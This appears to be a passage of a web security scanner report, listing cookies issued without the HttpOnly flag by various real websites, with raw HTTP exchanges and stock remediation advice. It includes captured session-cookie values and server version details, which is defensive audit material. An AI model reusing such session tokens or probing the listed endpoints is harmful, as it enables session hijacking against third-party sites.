GET /b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955?AQB=1&ndh=1&t=2%2F4%2F2011%2022%3A13%3A45%201%20300&ns=telecomitalia&pageName=ECM%3AHome&g=http%3A%2F%2Fwww.telecomitalia.it%2F&cc=EUR&ch=Home&events=event1&h1=Home&h2=telecomitalia.it%2CECM%2CHome&v5=D%3DpageName&v6=D%3Dch&c9=ECM&v9=ECM&c10=telecomitalia.it&v10=telecomitalia.it&c11=New&v11=New&c12=manuale%2Fcms&v16=navigazione&v17=non-browse&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: omniture.virgilio.it Proxy-Connection: keep-alive Referer: http://www.telecomitalia.it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 22:16:15 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|26DF96978507A1D7-6000010040005559[CE]; Expires=Sat, 30 Apr 2016 22:16:15 GMT; Domain=.virgilio.it; Path=/ Location: http://omniture.virgilio.it/b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955?AQB=1&pccr=true&vidn=26DF96978507A1D7-6000010040005559&&ndh=1&t=2%2F4%2F2011%2022%3A13%3A45%201%20300&ns=telecomitalia&pageName=ECM%3AHome&g=http%3A%2F%2Fwww.telecomitalia.it%2F&cc=EUR&ch=Home&events=event1&h1=Home&h2=telecomitalia.it%2CECM%2CHome&v5=D%3DpageName&v6=D%3Dch&c9=ECM&v9=ECM&c10=telecomitalia.it&v10=telecomitalia.it&c11=New&v11=New&c12=manuale%2Fcms&v16=navigazione&v17=non-browse&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.4.1 Expires: Sun, 01 May 2011 22:16:15 GMT Last-Modified: Tue, 03 May 2011 22:16:15 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www2 Content-Length: 0 Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /execute.cgi HTTP/1.1 Host: paginebianche.ilsole24ore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bin/search HTTP/1.1 Host: search.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 22:26:52 GMT Set-Cookie: B=bpo29tt6rubtc&b=3&s=kb; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: sSN=3eSvUDo2wWFRGwNfu4Zai5tBVkIRVcnL10fjiylXzSdqNCm1Gni_b8k7hSc2rpURGtOsHmJqBbg7yUFu05.v1w--; path=/; domain=.search.yahoo.com Location: http://search.yahoo.com/web?fr= Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private Content-Length: 86
<!-- syc13.search.ac2.yahoo.com uncompressed/chunked Mon May 2 15:26:52 PDT 2011 -->
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=bq4jvcopcniq8jdvo0dtnu3n95; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login.php HTTP/1.1 Host: account.musfiber.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/Main.dwt" codeOutsideHTMLIsLocked="false" --> <he ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/recuperapassword.do HTTP/1.1 Host: areaclienti187.telecomitalia.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/registrautente.do HTTP/1.1 Host: areaclienti187.telecomitalia.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cdas187/d/a/p18485/serv.do HTTP/1.1 Host: areaclienti187.telecomitalia.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 02 May 2011 22:23:24 GMT Server: Apache Cache-Control: no-cache="set-cookie" Content-Length: 2923 Set-Cookie: JSESSIONID_187CDAS=h72QN1ncLn59VV1nLzn2G6CN3GxcTPPH5rL1zPy022ctxnzFxMnC!-1329674579; path=/cdas187 X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding, User-Agent
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;" ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cdas187/d/a/p21608/serv2.do HTTP/1.1 Host: areaclienti187.telecomitalia.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 02 May 2011 22:23:30 GMT Server: Apache Cache-Control: no-cache="set-cookie" Content-Length: 2923 Set-Cookie: JSESSIONID_187CDAS=zn7KN1nCQT9GwTtRG9hmSm5nLcMP5Qtv5dTLTh3yhfPQKJRJ6TTK!6541692; path=/cdas187 X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding, User-Agent
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;" ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cdas187/d/a/p21618/serv3.do HTTP/1.1 Host: areaclienti187.telecomitalia.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 02 May 2011 22:23:31 GMT Server: Apache Cache-Control: no-cache="set-cookie" Content-Length: 2923 Set-Cookie: JSESSIONID_187CDAS=4894N1nDrQnTjgkyyxpjy5R22JChxQr3lZXQCDMq1pt2gwVLcG3W!-1852540237; path=/cdas187 X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding, User-Agent
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;" ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pr_home.jsp HTTP/1.1 Host: attiva.ilsole24ore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:23:34 GMT Server: Apache/2.0.63 (Unix) mod_jk/1.2.26 X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 Set-Cookie: JSESSIONID=1BA822532BA5DF3E077B74D8659CF3A1.worker2; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 15704
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /webapp/wcs/stores/servlet/PartnerVisit HTTP/1.1 Host: compraonline.mediaworld.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: cp.mightyblue.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HELM=Password=&Username=; ASPSESSIONIDCCABDABT=KDAKGJPDPIDLCPJOHPKKOIKD
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Helm : The Web Hosting Control System</title> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <lin ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forgotPassword.asp?noreturn=yes HTTP/1.1 Host: cp.mightyblue.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 21:20:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET pragma: no-cache cache-control: private cache-control: no-cache Content-Length: 4812 Content-Type: text/html Expires: Sun, 01 May 2011 21:20:28 GMT Set-Cookie: HELM=Password=&Username=; path=/ Set-Cookie: ASPSESSIONIDCCABDABT=JDAKGJPDBNFFGPKGHBLCENLI; path=/ ACCEPT-RANGES: none
<html> <head> <title>Helm : The Web Hosting Control System</title> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" / ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forgotPassword.asp?noreturn=yes HTTP/1.1 Host: cp.mightyblue.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 21:27:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET pragma: no-cache cache-control: private cache-control: no-cache Content-Length: 4812 Content-Type: text/html Expires: Sun, 01 May 2011 21:27:28 GMT Set-Cookie: HELM=Password=&Username=; path=/ Set-Cookie: ASPSESSIONIDCCBBBCAS=ELBIJAJDLCPFIJBGMHMCMHEA; path=/ ACCEPT-RANGES: none
<html> <head> <title>Helm : The Web Hosting Control System</title> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" / ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /default.asp HTTP/1.1 Host: eprocurement.eni.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: expertsystem.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 21:22:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 26280 Content-Type: text/html Set-Cookie: ASPSESSIONIDCACDTTDR=JFEIGGPCPJLGOBDOHIGKMLDP; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en HTTP/1.1 Host: factbook.eni.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en/home HTTP/1.1 Host: factbook.eni.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fcxp HTTP/1.1 Host: finanza-mercati.ilsole24ore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!-- DUMMY PAGE QUI SI E' VERIFICATO UN ERRORE: "La risorsa richiesta non e' attualmente disponibile sul server. Per favore controllare" DUMMY PAGE -->
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: mightyblue.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 21:20:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 37743 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQASDSRC=EMENEEBDJOOMEPPBDBBOJNOH; path=/ Cache-control: private ACCEPT-RANGES: none
<html> <head> <title>MightyBlue.com Hosting Services</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <META name="description" content="MightyBlue Web and Email hos ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /it_en HTTP/1.1 Host: multicard.eni.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /execute.cgi HTTP/1.1 Host: paginebianche.ilsole24ore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pgolfe/action HTTP/1.1 Host: paginegialle.ilsole24ore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache P3P: CP='NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR SAMa BUS IND UNI COM NAV INT' Content-Type: text/html;charset=UTF-8 Date: Mon, 02 May 2011 22:26:38 GMT Content-Length: 12417 Connection: close Set-Cookie: kpi=195.27.58.40.49021304375198356; path=/; expires=Thu, 29-Apr-21 22:26:38 GMT; domain=.paginegialle.it Set-Cookie: sessionid=7101682110525820065; Path=/ Set-Cookie: kpi=173.193.214.243.1304375198; expires=Sun, 02-May-2021 22:26:38 GMT; path=/; domain=paginegialle.it
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pix.aspx?atok=zx2-2183-it&eventtype=3&aid=200&mode=html&ver=2.5&ref=&r=0.9961211793124676 HTTP/1.1 Host: rainbow.mythings.com Proxy-Connection: keep-alive Referer: http://www.telecomitalia.it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Date: Mon, 02 May 2011 22:16:02 GMT Expires: -1 P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Pragma: no-cache Server: Microsoft-IIS/6.0 Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/ Set-Cookie: mt_zx2-2183-it=02|QwAAAB+LCAAAAAAABADsvQdgHEmWJSYvbcp7f0r1StfgdKEIgGATJNiQQBDswYjN5pLsHWlHIymrKoHKZVZlXWYWQMztnbz33nvvvffee++997o7nU4n99//P1xmZAFs9s5K2smeIYCqyB8/fnwfPyJ+cXZ+/uh73x8tsuLRR3s7Ox+NmotH3/vFefvo3sh+1DaPPtrd3bm/s7e3t/vpzt5Ho+mj3VEzpxd/yfd/yf8TAAD//5lh16VDAAAA; domain=.mythings.com; expires=Fri, 01-Jul-2011 22:16:02 GMT; path=/ Set-Cookie: cksession=424bced9-3349-491e-b41d-abd485764b45; domain=.mythings.com; path=/ Set-Cookie: ckid=e983b326-a4f8-4e01-aae3-4bac13918ccc; domain=.mythings.com; expires=Sun, 02-May-2021 22:16:02 GMT; path=/ Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/ Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/ Set-Cookie: mttgt={ts:"110502221602",cmp:[]}; domain=.mythings.com; expires=Fri, 01-Jul-2011 22:16:02 GMT; path=/ Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/ X-AspNet-Version: 4.0.30319 x-machine-name: Rainbow-28 (i-00667d77) X-Powered-By: ASP.NET Content-Length: 3147 Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /definition/expert-system HTTP/1.1 Host: searchcio-midmarket.techtarget.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 21:29:39 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=57A0F5F504CF1CC8C3E5AC2F73CA1B4A; Path=/ Cache-Control: max-age=600 Expires: Mon, 02 May 2011 21:39:33 GMT P3P: CP="CAO DSP COR NID CURa ADMa TAIa IVAo IVDo CONo TELo OTPo OUR IND PHY ONL UNI NAV DEM" Set-Cookie: BIGipServervgn7-web=704759818.20480.0000; path=/ Content-Length: 53314
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news/2240030637/CIO-survey-IT-salaries-in-2010-and-how-they-vary-by-industry HTTP/1.1 Host: searchcio.techtarget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:27:10 GMT Server: Apache-Coyote/1.1 Cache-Control: no-cache,no-store,must-revalidate Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=8A0EC464EE7664CEA88D868EA802EB5D; Path=/ P3P: CP="CAO DSP COR NID CURa ADMa TAIa IVAo IVDo CONo TELo OTPo OUR IND PHY ONL UNI NAV DEM" Connection: close Set-Cookie: BIGipServervgn7-web=704759818.20480.0000; path=/ Content-Length: 73912
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Helm : The Web Hosting Control System</title> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <lin ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Helm : The Web Hosting Control System</title> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <lin ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=abciclqX8qHL2b3JM0Y_s; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /kw HTTP/1.1 Host: technology.searchcio-midmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Resin/3.1.5 Pragma: no-cache Cache-Control: no-cache Expires: 0 max-age: Thu, 01 Jan 1970 00:00:00 GMT Content-Language: en Set-Cookie: JSESSIONID=abciclqX8qHL2b3JM0Y_s; path=/ Content-Type: text/html; charset=UTF-8 Connection: close Date: Mon, 02 May 2011 22:27:04 GMT Content-Length: 17205
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Sear ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /faves HTTP/1.1 Host: technorati.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jsp/Guidaffari_SHW_qi_090114_img.jsp HTTP/1.1 Host: websystem.ilsole24ore.com Proxy-Connection: keep-alive Referer: http://www.ilsole24ore.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Date: Mon, 02 May 2011 22:14:02 GMT Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny3 with Suhosin-Patch Set-Cookie: JSESSIONID=61EF80E340B75E472EEBC0C0202B46D0; Path=/jsp Location: http://adv.ilsole24ore.it/RealMedia/ads/adstream_nx.ads/advertising.ilsole24ore.com/2009/Guidaffari@x14 Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Content-Length: 0
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
amp.machine.id.cookie=aGFalo1QTnjVo3O-GQjgJCK; Expires=Sun, 21 May 2079 01:43:24 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /action/appDetail/292639 HTTP/1.1 Host: www.applications.sciverse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 22:29:19 GMT Server: www.applications.sciverse.com 9999 Location: http://www.applications.sciverse.com/action/userhome Content-Length: 0 Set-Cookie: JSESSIONID=0001aGFalo1QTnjVo3O-GQjgJCK:15gmm1282; Path=/ Set-Cookie: amp.machine.id.cookie=aGFalo1QTnjVo3O-GQjgJCK; Expires=Sun, 21 May 2079 01:43:24 GMT; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Content-Type: text/plain Content-Language: en-US Connection: close X-RE-Ref: 1 -1914337877 P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /autostrade/isMobile.do HTTP/1.1 Host: www.autostrade.it Proxy-Connection: keep-alive Referer: http://www.autostrade.it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
